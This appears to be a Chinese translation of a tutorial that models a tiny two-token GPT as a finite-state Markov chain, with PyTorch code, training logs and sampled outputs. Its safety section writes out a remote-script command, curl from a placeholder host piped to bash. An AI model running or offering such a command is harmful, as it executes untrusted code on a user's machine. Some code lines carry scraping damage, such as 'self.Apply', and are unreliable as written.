譯者序
本文整理和翻譯自 2023 年 Andrej Karpathy 的 Twitter 和一篇文章:
https://colab.research.google.com/drive/1SiF0KZJp75rUeetKOWqpsA8clmHP6jMg
Andrej Karpathy 博士 2015 畢業(yè)于斯坦福,之后先在 OpenAI 待了兩年,是 OpenAI 的創(chuàng)始成員和研究科學(xué)家,2017 年加入 Tesla,帶領(lǐng) Tesla Autopilot 團(tuán)隊(duì), 2022 年離職后在 YouTube 上科普人工智能相關(guān)技術(shù),2023 年重新回歸 OpenAI。
本文實(shí)際上是基于 PyTorch,并不是完全只用基礎(chǔ) Python/ target=_blank class=infotextkey>Python 包實(shí)現(xiàn)一個(gè) GPT。 主要目的是為了能讓大家對(duì) GPT 這樣一個(gè)復(fù)雜系統(tǒng)的(不那么底層的)內(nèi)部工作機(jī)制有個(gè)直觀理解。
本文所用的完整代碼見這里。
譯者水平有限,不免存在遺漏或錯(cuò)誤之處。如有疑問(wèn),敬請(qǐng)查閱原文。
以下是譯文。
- 譯者序
- 摘要
- 1 引言1.1 極簡(jiǎn) GPT:token 只有 0 和 11.2 狀態(tài)(上下文)和上下文長(zhǎng)度1.3 狀態(tài)空間1.3.1 簡(jiǎn)化版狀態(tài)空間1.3.2 真實(shí)版狀態(tài)空間1.4 狀態(tài)轉(zhuǎn)移1.5 馬爾科夫鏈
- 2 準(zhǔn)備工作2.1 安裝 pytorch2.2 BabyGPT 源碼babygpt.py
- 3 基于 BabyGPT 創(chuàng)建一個(gè) binary GPT3.1 設(shè)置 GPT 參數(shù)3.2 隨機(jī)初始化3.2.1 查看初始狀態(tài)和轉(zhuǎn)移概率3.2.2 狀態(tài)轉(zhuǎn)移圖3.3 訓(xùn)練3.3.1 輸入序列預(yù)處理3.3.2 開始訓(xùn)練3.3.3 訓(xùn)練之后的狀態(tài)轉(zhuǎn)移概率圖3.4 采樣(推理)3.5 完整示例
- 4 問(wèn)題討論4.1 詞典大小和上下文長(zhǎng)度4.2 模型對(duì)比:計(jì)算機(jī) vs. GPT4.3 模型參數(shù)大小(GPT 2/3/4)4.4 外部輸入(I/O 設(shè)備)4.5 AI 安全
- 5 其他:vocab_size=3,context_length=2BabyGPT
本文展示了一個(gè)極簡(jiǎn) GPT,它只有 2 個(gè) token 0 和 1,上下文長(zhǎng)度為 3; 這樣的 GPT 可以看做是一個(gè)有限狀態(tài)馬爾可夫鏈(FSMC)。 我們將用 token sequence 111101111011110 作為輸入對(duì)這個(gè)極簡(jiǎn) GPT 訓(xùn)練 50 次, 得到的狀態(tài)轉(zhuǎn)移概率符合我們的預(yù)期。

例如,
- 在訓(xùn)練數(shù)據(jù)中,狀態(tài) 101 -> 011 的概率是 100%,因此我們看到訓(xùn)練之后的模型中, 101 -> 011的轉(zhuǎn)移概率很高(79%,沒(méi)有達(dá)到 100% 是因?yàn)槲覀冎蛔隽?50 步迭代);
- 在訓(xùn)練數(shù)據(jù)中,狀態(tài) 111 -> 111 和 111 -> 110 的概率分別是 50%; 在訓(xùn)練之后的模型中,兩個(gè)轉(zhuǎn)移概率分別為 45% 和 55%,也差不多是一半一半;
- 在訓(xùn)練數(shù)據(jù)中沒(méi)有出現(xiàn) 000 這樣的狀態(tài),在訓(xùn)練之后的模型中, 它轉(zhuǎn)移到 001 和 000 的概率并不是平均的,而是差異很大(73% 到 001,27% 到 000), 這是 Transformer 內(nèi)部 inductive bias 的結(jié)果,也符合預(yù)期。
希望這個(gè)極簡(jiǎn)模型能讓大家對(duì) GPT 這樣一個(gè)復(fù)雜系統(tǒng)的內(nèi)部工作機(jī)制有個(gè)直觀的理解。
GPT 是一個(gè)神經(jīng)網(wǎng)絡(luò),根據(jù)輸入的 token sequence(例如,1234567) 來(lái)預(yù)測(cè)下一個(gè) token 出現(xiàn)的概率。
1.1 極簡(jiǎn) GPT:token 只有 0 和 1
如果所有可能的 token 只有兩個(gè),分別是 0 和 1,那這就是一個(gè) binary GPT,
- 輸入:由 0 和 1 組成的一串 token,例如 100011111,
- 輸出:“下一個(gè) token 是 0 的概率”(P(0))和“下一個(gè) token 是 1 的概率”(P(1))。
例如,如果已經(jīng)輸入的 token sequence 是 010(即 GPT 接受的輸入是 [0,1,0]), 那它可能根據(jù)自身當(dāng)前的一些參數(shù)和狀態(tài),計(jì)算出“下一個(gè) token 為 1 的可能性”是 80%,即
- P(0) = 20%
- P(1) = 80%
1.2 狀態(tài)(上下文)和上下文長(zhǎng)度
上面的例子中,我們是用三個(gè)相鄰的 token 來(lái)預(yù)測(cè)下一個(gè) token 的,那
- 三個(gè) token 就組成這個(gè) GPT 的一個(gè)上下文(context),也是 GPT 的一個(gè)狀態(tài),
- 3 就是上下文長(zhǎng)度(context length)。
從定義來(lái)說(shuō),如果上下文長(zhǎng)度為 3(個(gè) token),那么 GPT 在預(yù)測(cè)時(shí)最多只能使用 3 個(gè) token(但可以只使用 1 或 2 個(gè))。
一般來(lái)說(shuō),GPT 的輸入可以無(wú)限長(zhǎng),但上下文長(zhǎng)度是有限的。
1.3 狀態(tài)空間
狀態(tài)空間就是 GPT 需要處理的所有可能的狀態(tài)組成的集合。
為了表示狀態(tài)空間的大小,我們引入兩個(gè)變量:
- vocab_size(vocabulary size,字典空間):單個(gè) token 有多少種可能的值, 例如上面提到的 binary GPT 每個(gè) token 只有 0 和 1 這兩個(gè)可能的取值;
- context_length:上下文長(zhǎng)度,用 token 個(gè)數(shù)來(lái)表示,例如 3 個(gè) token。
1.3.1 簡(jiǎn)化版狀態(tài)空間
先來(lái)看簡(jiǎn)化版的狀態(tài)空間:只包括那些長(zhǎng)度等于 context_length 的 token sequence。 用公式來(lái)計(jì)算的話,總狀態(tài)數(shù)量等于字典空間(vocab_size)的冪次(context_length),即,
total_states = vocab_sizecontext_length
對(duì)于前面提到的例子,
- vocab_size = 2:token 可能的取值是 0 和 1,總共兩個(gè);
- context_length = 3 tokens:上下文長(zhǎng)度是 3 個(gè) token;
總的狀態(tài)數(shù)量就是 23= 8。這也很好理解,所有狀態(tài)枚舉就能出來(lái): {000, 001, 010, 011, 100, 101, 110, 111}。
1.3.2 真實(shí)版狀態(tài)空間
在真實(shí) GPT 中,預(yù)測(cè)下一個(gè) token 只需要輸入一個(gè)小于等于 context_length 的 token 序列就行了, 比如在我們這個(gè)例子中,要預(yù)測(cè)下一個(gè) token,可以輸入一個(gè),兩個(gè)或三個(gè) token,而不是必須輸入三個(gè) token 才能預(yù)測(cè)。 所以在這種情況下,狀態(tài)空間并不是 2^3=8,而是輸入 token 序列長(zhǎng)度分別為 1、2、3 情況下所有狀態(tài)的總和,
- token sequence 長(zhǎng)度為 1:總共 2^1 = 2 個(gè)狀態(tài)
- token sequence 長(zhǎng)度為 2:總共 2^2 = 4 個(gè)狀態(tài)
- token sequence 長(zhǎng)度為 3:總共 2^3 = 8 個(gè)狀態(tài)
因此總共 14 狀態(tài),狀態(tài)空間為 {0, 1, 00, 01, 10, 11, 000, 001, 010, 011, 100, 101, 110, 111}。
為了后面代碼方便,本文接下來(lái)將使用簡(jiǎn)化版狀態(tài)空間,即假設(shè)我們必須輸入一個(gè) 長(zhǎng)度為 context_length 的 token 序列才能預(yù)測(cè)下一個(gè) token。
1.4 狀態(tài)轉(zhuǎn)移
可以將 binary GPT 想象成拋硬幣:
- 正面朝上表示 token=1,反面朝上表示 token=0;
- 新來(lái)一個(gè) token 時(shí),將更新 context:將新 token 追加到最右邊,然后把最左邊的 token 去掉,從而得到一個(gè)新 context;
從 old context(例如 010)到 new context(例如 101)就稱為一次狀態(tài)轉(zhuǎn)移。
1.5 馬爾科夫鏈
根據(jù)以上分析,我們的簡(jiǎn)化版 GPT 其實(shí)就是一個(gè)有限狀態(tài)馬爾可夫鏈( Finite State Markov Chain):一組有限狀態(tài)和它們之間的轉(zhuǎn)移概率,
- Token sequence(例如 [0,1,0])組成狀態(tài)集合,
- 從一個(gè)狀態(tài)到另一個(gè)狀態(tài)的轉(zhuǎn)換是轉(zhuǎn)移概率。
接下來(lái)我們通過(guò)代碼來(lái)看看它是如何工作的。
2.1 安裝 pytorch
本文將基于 PyTorch 來(lái)實(shí)現(xiàn)我們的 GPT。這里直接安裝純 CPU 版本(不需要 GPU),方便測(cè)試:
$ pip3 install torch torchvision -i https://pypi.mirrors.ustc.edu.cn/simple # 用國(guó)內(nèi)源加速
$ pip3 install graphviz -i https://pypi.mirrors.ustc.edu.cn/simple
2.2 BabyGPT 源碼babygpt.py
這里基于 PyTorch 用 100 多行代碼實(shí)現(xiàn)一個(gè)簡(jiǎn)易版 GPT, 代碼不懂沒(méi)關(guān)系,可以把它當(dāng)黑盒,
#@title minimal GPT implementation in PyTorch
""" super minimal decoder-only gpt """
import math
from dataclasses import dataclass
import torch
import torch.nn as nn
from torch.nn import functional as F
torch.manual_seed(1337)
class CausalSelfAttention(nn.Module):
def __init__(self, config):
super().__init__()
assert config.n_embd % config.n_head == 0
# key, query, value projections for all heads, but in a batch
self.c_attn = nn.Linear(config.n_embd, 3 * config.n_embd, bias=config.bias)
# output projection
self.c_proj = nn.Linear(config.n_embd, config.n_embd, bias=config.bias)
# regularization
self.n_head = config.n_head
self.n_embd = config.n_embd
self.register_buffer("bias", torch.tril(torch.ones(config.block_size, config.block_size))
.view(1, 1, config.block_size, config.block_size))
def forward(self, x):
B, T, C = x.size() # batch size, sequence length, embedding dimensionality (n_embd)
# calculate query, key, values for all heads in batch and move head forward to be the batch dim
q, k ,v = self.c_attn(x).split(self.n_embd, dim=2)
k = k.view(B, T, self.n_head, C // self.n_head).transpose(1, 2) # (B, nh, T, hs)
q = q.view(B, T, self.n_head, C // self.n_head).transpose(1, 2) # (B, nh, T, hs)
v = v.view(B, T, self.n_head, C // self.n_head).transpose(1, 2) # (B, nh, T, hs)
# manual implementation of attention
att = (q @ k.transpose(-2, -1)) * (1.0 / math.sqrt(k.size(-1)))
att = att.masked_fill(self.bias[:,:,:T,:T] == 0, float('-inf'))
att = F.softmax(att, dim=-1)
y = att @ v # (B, nh, T, T) x (B, nh, T, hs) -> (B, nh, T, hs)
y = y.transpose(1, 2).contiguous().view(B, T, C) # re-assemble all head outputs side by side
# output projection
y = self.c_proj(y)
return y
class MLP(nn.Module):
def __init__(self, config):
super().__init__()
self.c_fc = nn.Linear(config.n_embd, 4 * config.n_embd, bias=config.bias)
self.c_proj = nn.Linear(4 * config.n_embd, config.n_embd, bias=config.bias)
self.nonlin = nn.GELU()
def forward(self, x):
x = self.c_fc(x)
x = self.nonlin(x)
x = self.c_proj(x)
return x
class Block(nn.Module):
def __init__(self, config):
super().__init__()
self.ln_1 = nn.LayerNorm(config.n_embd)
self.attn = CausalSelfAttention(config)
self.ln_2 = nn.LayerNorm(config.n_embd)
self.mlp = MLP(config)
def forward(self, x):
x = x + self.attn(self.ln_1(x))
x = x + self.mlp(self.ln_2(x))
return x
@dataclass
class GPTConfig:
# these are default GPT-2 hyperparameters
block_size: int = 1024
vocab_size: int = 50304
n_layer: int = 12
n_head: int = 12
n_embd: int = 768
bias: bool = False
class GPT(nn.Module):
def __init__(self, config):
super().__init__()
assert config.vocab_size is not None
assert config.block_size is not None
self.config = config
self.transformer = nn.ModuleDict(dict(
wte = nn.Embedding(config.vocab_size, config.n_embd),
wpe = nn.Embedding(config.block_size, config.n_embd),
h = nn.ModuleList([Block(config) for _ in range(config.n_layer)]),
ln_f = nn.LayerNorm(config.n_embd),
))
self.lm_head = nn.Linear(config.n_embd, config.vocab_size, bias=False)
self.transformer.wte.weight = self.lm_head.weight # https://paperswithcode.com/method/weight-tying
# init all weights
self.Apply(self._init_weights)
# apply special scaled init to the residual projections, per GPT-2 paper
for pn, p in self.named_parameters():
if pn.endswith('c_proj.weight'):
torch.nn.init.normal_(p, mean=0.0, std=0.02/math.sqrt(2 * config.n_layer))
# report number of parameters
print("number of parameters: %d" % (sum(p.nelement() for p in self.parameters()),))
def _init_weights(self, module):
if isinstance(module, nn.Linear):
torch.nn.init.normal_(module.weight, mean=0.0, std=0.02)
if module.bias is not None:
torch.nn.init.zeros_(module.bias)
elif isinstance(module, nn.Embedding):
torch.nn.init.normal_(module.weight, mean=0.0, std=0.02)
def forward(self, idx):
device = idx.device
b, t = idx.size()
assert t <= self.config.block_size, f"Cannot forward sequence of length {t}, block size is only {self.config.block_size}"
pos = torch.arange(0, t, dtype=torch.long, device=device).unsqueeze(0) # shape (1, t)
# forward the GPT model itself
tok_emb = self.transformer.wte(idx) # token embeddings of shape (b, t, n_embd)
pos_emb = self.transformer.wpe(pos) # position embeddings of shape (1, t, n_embd)
x = tok_emb + pos_emb
for block in self.transformer.h:
x = block(x)
x = self.transformer.ln_f(x)
logits = self.lm_head(x[:, -1, :]) # note: only returning logits at the last time step (-1), output is 2D (b, vocab_size)
return logits
接下來(lái)我們寫一些 python 代碼來(lái)基于這個(gè) GPT 做訓(xùn)練和推理。
3.1 設(shè)置 GPT 參數(shù)
首先初始化配置,
# hyperparameters for our GPT
vocab_size = 2 # 詞匯表 size 為 2,因此只有兩個(gè)可能的 token:0 和 1
context_length = 3 # 上下文長(zhǎng)度位 3,即只用 3 個(gè) bit 來(lái)預(yù)測(cè)下一個(gè) token 出現(xiàn)的概率
config = GPTConfig(
block_size = context_length,
vocab_size = vocab_size,
n_layer = 4, # 這個(gè)以及接下來(lái)幾個(gè)參數(shù)都是 Transformer 神經(jīng)網(wǎng)絡(luò)的 hyperparameters,
n_head = 4, # 不理解沒(méi)關(guān)系,認(rèn)為是 GPT 的默認(rèn)參數(shù)就行了。
n_embd = 16,
bias = False,
)
3.2 隨機(jī)初始化
基于以上配置創(chuàng)建一個(gè) GPT 對(duì)象,
執(zhí)行的時(shí)候會(huì)輸出一行日志:
Number of parameters: 12656
也就是說(shuō)這個(gè) GPT 內(nèi)部有 12656 個(gè)參數(shù),這個(gè)數(shù)字現(xiàn)在先不用太關(guān)心, 只需要知道它們都是隨機(jī)初始化的,它們決定了狀態(tài)之間的轉(zhuǎn)移概率。 平滑地調(diào)整參數(shù)也會(huì)平滑第影響狀態(tài)之間的轉(zhuǎn)換概率。
3.2.1 查看初始狀態(tài)和轉(zhuǎn)移概率
下面這個(gè)函數(shù)會(huì)列出 vocab_size=2,context_length=3 的所有狀態(tài):
def possible_states(n, k):
# return all possible lists of k elements, each in range of [0,n)
if k == 0:
yield []
else:
for i in range(n):
for c in possible_states(n, k - 1):
yield [i] + c
list(possible_states(vocab_size, context_length))
接下來(lái)我們就拿這些狀態(tài)作為輸入來(lái)訓(xùn)練 binary GPT:
def plot_model():
dot = Digraph(comment='Baby GPT', engine='circo')
print("nDump BabyGPT state ...")
for xi in possible_states(gpt.config.vocab_size, gpt.config.block_size):
# forward the GPT and get probabilities for next token
x = torch.tensor(xi, dtype=torch.long)[None, ...] # turn the list into a torch tensor and add a batch dimension
logits = gpt(x) # forward the gpt neural.NET
probs = nn.functional.softmax(logits, dim=-1) # get the probabilities
y = probs[0].tolist() # remove the batch dimension and unpack the tensor into simple list
print(f"input {xi} ---> {y}")
# also build up the transition graph for plotting later
current_node_signature = "".join(str(d) for d in xi)
dot.node(current_node_signature)
for t in range(gpt.config.vocab_size):
next_node = xi[1:] + [t] # crop the context and append the next character
next_node_signature = "".join(str(d) for d in next_node)
p = y[t]
label=f"{t}({p*100:.0f}%)"
dot.edge(current_node_signature, next_node_signature, label=label)
return dot
這個(gè)函數(shù)除了在每個(gè)狀態(tài)上運(yùn)行 GPT,預(yù)測(cè)下一個(gè) token 的概率,還會(huì)記錄畫狀態(tài)轉(zhuǎn)移圖所需的數(shù)據(jù)。 下面是訓(xùn)練結(jié)果:
# 輸入狀態(tài) 輸出概率 [P(0), P(1) ]
input [0, 0, 0] ---> [0.4963349997997284, 0.5036649107933044]
input [0, 0, 1] ---> [0.4515703618526459, 0.5484296679496765]
input [0, 1, 0] ---> [0.49648362398147583, 0.5035163760185242]
input [0, 1, 1] ---> [0.45181113481521606, 0.5481888651847839]
input [1, 0, 0] ---> [0.4961162209510803, 0.5038837194442749]
input [1, 0, 1] ---> [0.4517717957496643, 0.5482282042503357]
input [1, 1, 0] ---> [0.4962802827358246, 0.5037197470664978]
input [1, 1, 1] ---> [0.4520467519760132, 0.5479532480239868]
3.2.2 狀態(tài)轉(zhuǎn)移圖
對(duì)應(yīng)的狀態(tài)轉(zhuǎn)移圖(代碼所在目錄下生成的 states-1.png):

可以看到 8 個(gè)狀態(tài)以及它們之間的轉(zhuǎn)移概率。幾點(diǎn)說(shuō)明:
- 在每個(gè)狀態(tài)下,下一個(gè) token 只有 0 和 1 兩種可能,因此每個(gè)節(jié)點(diǎn)有 2 個(gè)出向箭頭;
- 每個(gè)狀態(tài)的入向箭頭數(shù)量不完全一樣;
- 每次狀態(tài)轉(zhuǎn)換時(shí),最左邊的 token 被丟棄,新 token 會(huì)追加到最右側(cè),這個(gè)前面也介紹過(guò)了;
- 另外注意到,此時(shí)的狀態(tài)轉(zhuǎn)移概率大部分都是均勻分布的(這個(gè)例子中是 50%), 這也符合預(yù)期,因?yàn)槲覀?strong>還沒(méi)拿真正的輸入序列(不是初始的 8 個(gè)狀態(tài))來(lái)訓(xùn)練這個(gè)模型。
3.3 訓(xùn)練
3.3.1 輸入序列預(yù)處理
接下來(lái)我們拿下面這段 token sequence 來(lái)訓(xùn)練上面已經(jīng)初始化好的 GPT:
Python 3.8.2 (default, Mar 13 2020, 10:14:16)
>>> seq = list(map(int, "111101111011110"))
>>> seq
[1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0]
將以上 token sequence 轉(zhuǎn)換成 tensor,記錄每個(gè)樣本:
def get_tensor_from_token_sequence():
X, Y = [], []
# iterate over the sequence and grab every consecutive 3 bits
# the correct label for what's next is the next bit at each position
for i in range(len(seq) - context_length):
X.append(seq[i:i+context_length])
Y.append(seq[i+context_length])
print(f"example {i+1:2d}: {X[-1]} --> {Y[-1]}")
X = torch.tensor(X, dtype=torch.long)
Y = torch.tensor(Y, dtype=torch.long)
print(X.shape, Y.shape)
get_tensor_from_token_sequence()
輸出:
example 1: [1, 1, 1] --> 1
example 2: [1, 1, 1] --> 0
example 3: [1, 1, 0] --> 1
example 4: [1, 0, 1] --> 1
example 5: [0, 1, 1] --> 1
example 6: [1, 1, 1] --> 1
example 7: [1, 1, 1] --> 0
example 8: [1, 1, 0] --> 1
example 9: [1, 0, 1] --> 1
example 10: [0, 1, 1] --> 1
example 11: [1, 1, 1] --> 1
example 12: [1, 1, 1] --> 0
torch.Size([12, 3]) torch.Size([12])
可以看到這個(gè) token sequence 分割成了 12 個(gè)樣本。接下來(lái)就可以訓(xùn)練了。
3.3.2 開始訓(xùn)練
def do_training(X, Y):
# init a GPT and the optimizer
torch.manual_seed(1337)
gpt = babygpt.GPT(config)
optimizer = torch.optim.AdamW(gpt.parameters(), lr=1e-3, weight_decay=1e-1)
# train the GPT for some number of iterations
for i in range(50):
logits = gpt(X)
loss = F.cross_entropy(logits, Y)
loss.backward()
optimizer.step()
optimizer.zero_grad()
print(i, loss.item())
do_training(X, Y)
輸出:
0 0.663539469242096
1 0.6393510103225708
2 0.6280076503753662
3 0.6231870055198669
4 0.6198631525039673
5 0.6163331270217896
6 0.6124278903007507
7 0.6083487868309021
8 0.6043017506599426
9 0.6004215478897095
10 0.5967749953269958
11 0.5933789610862732
12 0.5902208685874939
13 0.5872761011123657
14 0.5845204591751099
15 0.5819371342658997
16 0.5795179009437561
17 0.5772626996040344
18 0.5751749873161316
19 0.5732589960098267
20 0.5715171694755554
21 0.5699482560157776
22 0.5685476660728455
23 0.5673080086708069
24 0.5662192106246948
25 0.5652689337730408
26 0.5644428730010986
27 0.563723087310791
28 0.5630872845649719
29 0.5625078678131104
30 0.5619534254074097
31 0.5613844990730286
32 0.5607481598854065
33 0.5599767565727234
34 0.5589826107025146
35 0.5576505064964294
36 0.5558211803436279
37 0.5532580018043518
38 0.5495675802230835
39 0.5440602898597717
40 0.5359978079795837
41 0.5282725095748901
42 0.5195847153663635
43 0.5095029473304749
44 0.5019271969795227
45 0.49031805992126465
46 0.48338067531585693
47 0.4769590198993683
48 0.47185763716697693
49 0.4699831008911133
3.3.3 訓(xùn)練之后的狀態(tài)轉(zhuǎn)移概率圖
以上輸出對(duì)應(yīng)的狀態(tài)轉(zhuǎn)移圖 (代碼所在目錄下生成的 states-2.png):

可以看出訓(xùn)練之后的狀態(tài)轉(zhuǎn)移概率變了,這也符合預(yù)期。比如在我們的訓(xùn)練數(shù)據(jù)中,
- 101 總是轉(zhuǎn)換為 011:經(jīng)過(guò) 50 次訓(xùn)練之后,我們看到這種轉(zhuǎn)換有79%的概率;
- 111 在 50% 的時(shí)間內(nèi)變?yōu)?111,在 50% 的時(shí)間內(nèi)變?yōu)?110:訓(xùn)練之后概率分別是 45% 和 55%。
其他幾點(diǎn)需要注意的地方:
- 沒(méi)有看到 100% 或 50% 的轉(zhuǎn)移概率:
- 這是因?yàn)?strong>神經(jīng)網(wǎng)絡(luò)沒(méi)有經(jīng)過(guò)充分訓(xùn)練,繼續(xù)訓(xùn)練就會(huì)出現(xiàn)更接近這兩個(gè)值的轉(zhuǎn)移概率;
- 訓(xùn)練數(shù)據(jù)中沒(méi)出現(xiàn)過(guò)的狀態(tài)(例如 000 或 100),轉(zhuǎn)移到下一個(gè)狀態(tài)的概率 (預(yù)測(cè)下一個(gè) token 是 0 還是 1 的概率)并不是均勻的(50% vs. 50%), 而是差異很大(上圖中是 75% vs. 25%)。
- 如果訓(xùn)練期間從未遇到過(guò)這些狀態(tài),那它們的轉(zhuǎn)移概率不應(yīng)該在 ~50% 嗎? 不是,以上結(jié)果也是符合預(yù)期的。因?yàn)?strong>在真實(shí)部署場(chǎng)景中,GPT 的幾乎每個(gè)輸入都沒(méi)有在訓(xùn)練中見過(guò)。 這種情況下,我們依靠 GPT 自身內(nèi)部設(shè)計(jì)及其 inductive bias 來(lái)執(zhí)行適當(dāng)?shù)姆夯?/li>
3.4 采樣(推理)
最后,我們?cè)囋噺倪@個(gè) GPT 中采樣:初始輸入是 111,然后依次預(yù)測(cè)接下來(lái)的 20 個(gè) token,
xi = [1, 1, 1] # the starting sequence
fullseq = xi.copy()
print(f"init: {xi}")
for k in range(20):
x = torch.tensor(xi, dtype=torch.long)[None, ...]
logits = gpt(x)
probs = nn.functional.softmax(logits, dim=-1)
t = torch.multinomial(probs[0], num_samples=1).item() # sample from the probability distribution
xi = xi[1:] + [t] # transition to the next state
fullseq.append(t)
print(f"step {k}: state {xi}")
print("nfull sampled sequence:")
print("".join(map(str, fullseq)))
輸出:
init: [1, 1, 1]
step 0: state [1, 1, 0]
step 1: state [1, 0, 1]
step 2: state [0, 1, 1]
step 3: state [1, 1, 1]
step 4: state [1, 1, 0]
step 5: state [1, 0, 1]
step 6: state [0, 1, 1]
step 7: state [1, 1, 1]
step 8: state [1, 1, 0]
step 9: state [1, 0, 1]
step 10: state [0, 1, 1]
step 11: state [1, 1, 0]
step 12: state [1, 0, 1]
step 13: state [0, 1, 1]
step 14: state [1, 1, 1]
step 15: state [1, 1, 1]
step 16: state [1, 1, 0]
step 17: state [1, 0, 1]
step 18: state [0, 1, 0]
step 19: state [1, 0, 1]
full sampled sequence:
11101110111011011110101
- 采樣得到的序列:11101110111011011110101
- 之前的訓(xùn)練序列:111101111011110
我們的 GPT 訓(xùn)練的越充分,采樣得到的序列就會(huì)跟訓(xùn)練序列越像。 但在本文的例子中,我們永遠(yuǎn)得不到完美結(jié)果, 因?yàn)闋顟B(tài) 111 的下一個(gè) token 是模糊的:50% 概率是 1,50% 是 0。
3.5 完整示例
源文件:
All-in-one 執(zhí)行:
生成的兩個(gè)狀態(tài)轉(zhuǎn)移圖:
$ ls *.png
states-1.png states-2.png
4.1 詞典大小和上下文長(zhǎng)度
本文討論的是基于 3 個(gè) token 的二進(jìn)制 GPT。實(shí)際應(yīng)用場(chǎng)景中,
- vocab_size 會(huì)遠(yuǎn)遠(yuǎn)大于 2,例如 50 萬(wàn);
- context_length 的典型范圍2048 ~ 32000。
4.2 模型對(duì)比:計(jì)算機(jī) vs. GPT
計(jì)算機(jī)(computers)的計(jì)算過(guò)程其實(shí)也是類似的,
- 計(jì)算機(jī)有內(nèi)存,存儲(chǔ)離散的 bits;
- 計(jì)算機(jī)有 CPU,定義轉(zhuǎn)移表(transition table);
但它們用的更像是一個(gè)是有限狀態(tài)機(jī)(FSM)而不是有限狀態(tài)馬爾可夫鏈(FSMC)。 另外,計(jì)算機(jī)是確定性動(dòng)態(tài)系統(tǒng)( deterministic dynamic systems), 所以每個(gè)狀態(tài)的轉(zhuǎn)移概率中,有一個(gè)是 100%,其他都是 0%,也就是說(shuō)它每次都是從一個(gè)狀態(tài) 100% 轉(zhuǎn)移到下一個(gè)狀態(tài),不存在模糊性(否則世界就亂套了,想象一下轉(zhuǎn)賬 100 塊錢, 不是只有成功和失敗兩種結(jié)果,而是有可能轉(zhuǎn)過(guò)去 90,有可能轉(zhuǎn)過(guò)去 10 塊)。
GPT 則是一種另一種計(jì)算機(jī)體系結(jié)構(gòu),
- 默認(rèn)情況下是隨機(jī)的,
- 計(jì)算的是 token 而不是比特。
也就是說(shuō),即使在絕對(duì)零度采樣,也不太可能將 GPT 變成一個(gè) FSM。 這意味著每次狀態(tài)轉(zhuǎn)移都是貪婪地挑概率最大的 token;但也可以通過(guò) beam search 算法來(lái)降低這種貪婪性。 但是,在采樣時(shí)完全丟棄這些熵也是有副作用的,采樣 benchmark 以及樣本的 qualitative look and feel 都會(huì)下降(看起來(lái)很“安全”,無(wú)聊),因此實(shí)際上通常不會(huì)這么做。
4.3 模型參數(shù)大小(GPT 2/3/4)
本文的例子是用 3bit 來(lái)存儲(chǔ)一個(gè)狀態(tài),因此所需存儲(chǔ)空間極小;但真實(shí)世界中的 GPT 模型所需的存儲(chǔ)空間就大了。
這篇文章 對(duì)比了 GPT 和常規(guī)計(jì)算機(jī)(computers)的 size,例如:
- GPT-2 有50257個(gè)獨(dú)立 token,上下文長(zhǎng)度是2048個(gè) token。
- 每個(gè) token 需要 log2(50257) ≈ 15.6bit 來(lái)表示,那一個(gè)上下文或 一個(gè)狀態(tài)需要的存儲(chǔ)空間就是15.6 bit/token * 2048 token = 31Kb ≈ 4KB。 這足以 登上月球。
- GPT-3 的上下文長(zhǎng)度為4096 tokens,因此需要8KB內(nèi)存;大致是 Atari 800 的量級(jí);
- GPT-4 的上下文長(zhǎng)度高達(dá)32K tokens,因此大約64KB才能存儲(chǔ)一個(gè)狀態(tài),對(duì)應(yīng) Commodore64。
4.4 外部輸入(I/O 設(shè)備)
一旦引入外部世界的輸入信號(hào),F(xiàn)SM 分析就會(huì)迅速失效了,因?yàn)闀?huì)出現(xiàn)大量新的狀態(tài)。
- 對(duì)于計(jì)算機(jī)來(lái)說(shuō),外部輸入包括鼠標(biāo)、鍵盤信號(hào)等等;
- 對(duì)于 GPT,就是 Microsoft Bing 這樣的外部工具,它們將用戶搜索的內(nèi)容作為輸入提交給 GPT。
4.5 AI 安全
如果把 GPT 看做有限狀態(tài)馬爾可夫鏈,那 GPT 的安全需要考慮什么? 答案是將所有轉(zhuǎn)移到不良狀態(tài)的概率降低到 0(elimination of all probability of transitioning to naughty states), 例如以 token 序列 [66, 6371, 532, 82, 3740, 1378, 23542, 6371, 13, 785, 14, 79, 675, 276, 13, 1477, 930, 27334] 結(jié)尾的狀態(tài) —— 這個(gè) token sequence 其實(shí)就是curl -s
https://evilurl.com/pwned.sh | bash這一 shell 命令的編碼,如果真實(shí)環(huán)境中用戶執(zhí)行了此類惡意命令將是非常危險(xiǎn)的。
更一般地來(lái)說(shuō),可以設(shè)想狀態(tài)空間的某些部分是“紅色”的,
- 首先,我們永遠(yuǎn)不想轉(zhuǎn)移到這些不良狀態(tài);
- 其次,這些不良狀態(tài)很多,無(wú)法一次性列舉出來(lái);
因此,GPT 模型本身必須能夠基于訓(xùn)練數(shù)據(jù)和 Transformer 的歸納偏差, 自己就能知道這些狀態(tài)是不良的,轉(zhuǎn)移概率應(yīng)該設(shè)置為 0%。 如果概率沒(méi)有收斂到足夠小(例如 < 1e-100),那在足夠大型的部署中 (例如溫度 > 0,也沒(méi)有用 topp/topk sampling hyperparameters 強(qiáng)制將低概率置為零) 可能就會(huì)命中這個(gè)概率,造成安全事故。
作為練習(xí),讀者也可以創(chuàng)建一個(gè) vocab_size=3,context_length=2 的 GPT。 在這種情況下,每個(gè)節(jié)點(diǎn)有 3 個(gè)轉(zhuǎn)移概率,默認(rèn)初始化下,基本都是 33% 分布。
config = GPTConfig(
block_size = 2,
vocab_size = 3,
n_layer = 4,
n_head = 4,
n_embd = 16,
bias = False,
)
gpt = GPT(config)
plot_model()
from: https://arthurchiao.Github.io/blog/gpt-as-a-finite-state-markov-chain-zh/